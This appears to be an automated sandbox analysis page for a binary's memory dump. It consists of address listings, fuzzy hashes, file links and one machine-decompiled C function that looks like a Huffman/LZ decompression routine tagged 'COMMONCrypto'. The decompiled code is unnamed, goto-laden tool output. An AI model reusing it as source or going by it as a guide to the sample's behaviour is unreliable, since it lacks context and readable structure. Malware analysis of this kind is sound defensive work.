0x0083ec3f
0x0083ec43
0x0083ec43
0x0083ec43
0x0083ec48
0x0083ec4c
0x0083ec54
0x0083ec5a
0x0083ec5d
0x0083ec60
0x0083ec6f
0x0083ec7e
0x0083ec80
0x0083ec83
0x0083ec89
0x0083ec93
0x0083ec98
0x0083ec9e
0x0083eca2
0x0083eca6
0x0083ecaa
0x0083ecae
0x0083ecb3
0x0083ecc6
0x0083ecd5
0x0083ecd7
0x0083ecda
0x0083ece0
0x0083ece5
0x0083ecf8
0x0083ecfe
0x0083ed02
0x0083ed12
0x0083ed1b
0x0083ed25
0x0083ed28
0x0083ed2a
0x0083ed31
0x0083ed37
0x0083ed46
0x0083ed53
0x0083ed59
0x0083ed61
0x0083ed82
0x0083ed85
0x0083ed8c
0x0083ed90
0x0083ed93
0x0083ed9d
0x0083edad
0x0083edb2
0x0083edba
0x0083edd1
0x0083edd8
0x0083eddc
0x0083edde
0x0083ede1
0x0083ede7
0x0083edf0
0x0083ee00
0x0083ee05
0x0083ee0c
0x0083ee10
0x0083ee14
0x0083ee1f
0x0083ee20
0x0083ee2a
0x0083ee2a
0x0083ee2a
0x0083ee2d
0x0083ee30
0x0083ee37
0x0083ee3c
0x0083ee41
0x0083ee48
0x0083ee56
0x0083ee65
0x0083ee67
0x0083ee6d
0x0083ee7c
0x0083ee7f
0x0083ee82
0x0083ee83
0x0083ee8f
0x0083ee93
0x0083ee9d
0x0083ee9f
0x0083eea6
0x0083eeb6
0x0083eebf
0x0083eec1
0x0083eec4
0x0083eed0
0x0083eed8
0x0083eedf
0x0083eee2
0x0083eee6
0x0083eeec
0x0083eef2
0x0083eef6
0x0083ef06
0x0083ef15
0x0083ef18
0x0083ef1a
0x0083ef1d
0x0083ef41
0x0083ef4a
0x0083ef4d
0x0083ef4f
0x0083ef53
0x0083ef5d
0x0083ef64
0x0083ef7a
0x0083ef84
0x0083ef86
0x0083ef8a
0x0083ef98
0x0083efa7
0x0083efaf
0x0083efb4
0x0083efbb
0x0083efd4
0x0083efda
0x0083efdc
0x0083efe0
0x0083efe6
0x0083efee
0x0083eff3
0x0083f003
0x0083f009
0x0083f00d
0x0083f017
0x00000000
0x00000000
0x0083ee26
0x0083ee26
0x0083f01f
0x0083f020
0x0083f024
0x0083f024
0x0083f024
0x0083f029
0x0083f02d
0x0083f032
0x0083f037
0x0083f03c
0x0083f03e
0x0083f040
0x0083f044
0x0083f053
0x0083f062
0x0083f064
0x0083f067
0x0083f06f
0x0083f074
0x0083f07d
0x0083f083
0x0083f087
0x0083f08b
0x0083f092
0x0083f094
0x0083f0a7
0x0083f0b6
0x0083f0b8
0x0083f0bb
0x0083f0c3
0x0083f0d6
0x0083f0da
0x0083f0de
0x0083f0e1
0x0083f0f1
0x0083f0fa
0x0083f104
0x0083f107
0x0083f109
0x0083f110
0x0083f114
0x0083f129
0x0083f132
0x0083f136
0x0083f13a
0x0083f15f
0x0083f168
0x0083f16b
0x0083f16d
0x0083f170
0x0083f17e
0x0083f18b
0x0083f1a8
0x0083f1ab
0x0083f1af
0x0083f1b1
0x0083f1b4
0x0083f1ba
0x0083f1c2
0x0083f1cb
0x0083f1cf
0x0083f1d8
0x0083f1dc
0x0083f1de
0x0083f1e5
0x0083f1e9
0x0083f1f2
0x0083f1f6
0x0083f1f9
0x0083f1fc
0x0083f1ff
0x0083f201
0x0083f20b

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7b0ccbe73f12176ec16f512a93a580537ef3023298fa6d6ddcdcaff0b82cb7
Instruction ID: 8ec654e22ff1ca7fe22ee78264803d19a5accb221862709752b0dda0d33caf0b
Opcode Fuzzy Hash: 4e7b0ccbe73f12176ec16f512a93a580537ef3023298fa6d6ddcdcaff0b82cb7
Instruction Fuzzy Hash: D8524AB26047019FC758CF18C891A6AF7E1FFC8304F49992DF9868B255D334E919CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00846715, Relevance: .5, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00846715(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x34);
				 *(_t455 + 0x14) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x14) = _t201;
						 *(_t455 + 0x10) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x3c) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00852BBE(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00836E54(0x8700e0);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x24) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E0083A591(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E0083A591(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E0083A591(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x24))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x14);
														_t201 =  *(_t455 + 0x18);
														_t293 =  *(_t455 + 0x3c);
														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x14);
											_t201 =  *(_t455 + 0x18);
											_t293 =  *(_t455 + 0x3c);
											continue;
										}
										_push(_t455 + 0x28);
										E008435D7(_t443, _t438);
										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x2c);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x30);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x10) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E0083A591(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E0083A591(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x20) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x10) + 1;
												 *(_t455 + 0x10) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x10) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x10) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x24);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x10);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00847DE9(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00847DE9(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E0083A591(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E008439F2(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}

0x0084671a
0x00846720
0x00846728
0x0084674f
0x00846752
0x00846758
0x0084675b
0x0084675d
0x00846775
0x0084677c
0x0084677e
0x00846781
0x00846785
0x0084678a
0x0084678c
0x0084678e
0x00846790
0x00846790
0x00846792
0x00846796
0x00846796
0x00846798
0x0084679a
0x00000000
0x00000000
0x0084679c
0x0084679c
0x0084679e
0x00846d15
0x00846d16
0x00000000
0x00846d16
0x008467a4
0x008467b2
0x008467b2
0x008467b4
0x008467c3
0x008467c3
0x008467c9
0x00846d0e
0x00846d0e
0x00000000
0x00846d0e
0x00000000
0x008467c9
0x008467b6
0x008467bd
0x00000000
0x00000000
0x00000000
0x008467bd
0x008467a6
0x008467a9
0x008467ac
0x00000000
0x00000000
0x00000000
0x008467cf
0x008467cf
0x008467d8
0x008467de
0x008467e0
0x008467e3
0x008467ec
0x008467ed
0x008467f8
0x008467fc
0x008467fe
0x00846805
0x00846805
0x0084680a
0x0084680a
0x00846810
0x0084681b
0x00846822
0x00846826
0x0084682c
0x00846833
0x00846839
0x0084683f
0x00846843
0x00846870
0x00846871
0x00846872
0x00846874
0x0084688d
0x00846890
0x00846897
0x0084689a
0x0084689d
0x008468a5
0x008468ae
0x008468b2
0x008468b4
0x008468b7
0x008468b9
0x008468b9
0x008468bb
0x00000000
0x008468bb
0x00846879
0x0084687c
0x0084687c
0x0084687e
0x00000000
0x00000000
0x00846880
0x00846881
0x00846884
0x00846887
0x00000000
0x00000000
0x00000000
0x00846889
0x0084688b
0x00000000
0x00846845
0x00846847
0x0084684a
0x00846854
0x0084685c
0x00846861
0x00846864
0x008468c3
0x008468c8
0x008468ca
0x00846918
0x0084691e
0x00846b91
0x00846b93
0x00846be4
0x00846bea
0x00846bf9
0x00846bfa
0x00846c04
0x00846c07
0x00846c0e
0x00846c14
0x00846c1a
0x00846c21
0x00846c4e
0x00846c4f
0x00846c50
0x00846c52
0x00846c6e
0x00846c71
0x00846c78
0x00846c7b
0x00846c7e
0x00846c89
0x00846c95
0x00846c97
0x00846c9d
0x00846c9f
0x00846c9f
0x00846ca1
0x00846ca9
0x00846ca9
0x00846cac
0x00846caf
0x00846cbd
0x00846cc0
0x00846cc8
0x00846ccb
0x00846ccd
0x00846cd1
0x00846cd8
0x00846ce0
0x00846ce2
0x00846ce9
0x00846ceb
0x00846ceb
0x00846cee
0x00846cee
0x00846cb1
0x00846cb1
0x00846cb1
0x00846cf5
0x00846cf9
0x00846cf9
0x00846cfd
0x00846d01
0x00846d05
0x00846796
0x00846796
0x00846798
0x0084679a
0x00000000
0x00000000
0x00000000
0x0084679a
0x00846796
0x00846c5a
0x00846c5d
0x00846c5d
0x00846c5f
0x00000000
0x00000000
0x00846c61
0x00846c62
0x00846c65
0x00846c68
0x00000000
0x00000000
0x00000000
0x00846c6a
0x00846c6c
0x00000000
0x00846c6c
0x00846c25
0x00846c28
0x00846c32
0x00846c3a
0x00846c3f
0x00846c42
0x00000000
0x00846c42
0x00846bec
0x008468f9
0x008468f9
0x008468fd
0x00846901
0x00000000
0x00846901
0x00846b9b
0x00846b9d
0x00846ba7
0x00846baf
0x00846bb4
0x00846bb5
0x00846bb7
0x00846bc0
0x00846bc7
0x00846bd2
0x00846bda
0x00846bdc
0x00000000
0x00846bdc
0x00846924
0x0084692a
0x0084692d
0x0084693a
0x0084693d
0x00846943
0x00846943
0x0084692f
0x0084692f
0x0084692f
0x00846945
0x00846948
0x0084694c
0x0084694e
0x00846952
0x00846959
0x00846963
0x00846965
0x0084696e
0x00846970
0x00846970
0x00846973
0x00846973
0x00846978
0x0084697f
0x00846985
0x0084698b
0x00846992
0x008469bf
0x008469c0
0x008469c1
0x008469c3
0x008469df
0x008469e2
0x008469e9
0x008469ec
0x008469ef
0x008469fa
0x00846a06
0x00846a08
0x00846a0e
0x00846a10
0x00846a10
0x00846a12
0x00000000
0x00846a12
0x008469cb
0x008469ce
0x008469ce
0x008469d0
0x00000000
0x00000000
0x008469d2
0x008469d3
0x008469d6
0x008469d9
0x00000000
0x00000000
0x00000000
0x008469db
0x008469dd
0x00000000
0x00846994
0x00846996
0x00846999
0x008469a3
0x008469ab
0x008469b0
0x008469b3
0x00846a1a
0x00846a1a
0x00846a1d
0x00846a20
0x00846a30
0x00846a33
0x00846a33
0x00846a22
0x00846a22
0x00846a22
0x00846a35
0x00846a36
0x00846a3a
0x00846a3c
0x00846a3e
0x00846b4c
0x00846b4c
0x00846b52
0x00846b58
0x00846b59
0x00846b5d
0x00846b63
0x00846b65
0x00846b66
0x00846b6a
0x00846b70
0x00846b72
0x00846b72
0x00846b73
0x00846b73
0x00846b70
0x00846b63
0x00846b77
0x00846b7f
0x00846b85
0x00846b89
0x00000000
0x00846a44
0x00846a44
0x00846a47
0x00846b28
0x00846b31
0x00846b39
0x00846b3d
0x00846b44
0x00846b46
0x00846b46
0x00846b49
0x00000000
0x00846b49
0x00846a4d
0x00846a51
0x00846a5a
0x00846a68
0x00846a6c
0x00846a73
0x00846a75
0x00846a75
0x00846a78
0x00846a78
0x00846a7d
0x00846a84
0x00846a8a
0x00846a90
0x00846a97
0x00846ac4
0x00846ac5
0x00846ac6
0x00846ac8
0x00846ae4
0x00846ae7
0x00846aee
0x00846af1
0x00846af4
0x00846aff
0x00846b0b
0x00846b0d
0x00846b13
0x00846b15
0x00846b15
0x00846b17
0x00000000
0x00846b17
0x00846ad0
0x00846ad3
0x00846ad3
0x00846ad5
0x00000000
0x00000000
0x00846ad7
0x00846ad8
0x00846adb
0x00846ade
0x00000000
0x00000000
0x00000000
0x00846ae0
0x00846ae2
0x00000000
0x00846a99
0x00846a9b
0x00846a9e
0x00846aa8
0x00846ab0
0x00846ab5
0x00846ab8
0x00846b1f
0x00846b22
0x00000000
0x00846b22
0x00846a97
0x00846a3e
0x00846992
0x008468cc
0x008468d3
0x0084690a
0x0084690a
0x0084690f
0x00846912
0x00000000
0x00846912
0x008468d5
0x008468d9
0x00000000
0x00000000
0x008468db
0x008468e1
0x008468e2
0x008468e5
0x00000000
0x00000000
0x008468e7
0x008468e8
0x008468ef
0x008468f3
0x008468f3
0x008468f3
0x00000000
0x008468f3
0x00846843
0x00846796
0x0084675f
0x00000000
0x0084672a
0x0084672d
0x00846731
0x00846735
0x00846739
0x0084673a
0x00846741
0x00000000
0x00846743
0x00846743
0x00000000
0x00846743
0x00846741

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f66429ba08b60a48171dd6a99d756ec69d598a274b11932ab88dfd3645e5d64
Instruction ID: 5b76dac38ffad9301cc69db56d0ffe3838e1c1f841940a67dbb133441f44bc23
Opcode Fuzzy Hash: 9f66429ba08b60a48171dd6a99d756ec69d598a274b11932ab88dfd3645e5d64
Instruction Fuzzy Hash: 2312D3B160470A8BC729CF28C9D06B9B7E1FF55308F14893ED597C7A81E774A8A4CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0083BB6E, Relevance: .4, Instructions: 449
COMMONCrypto

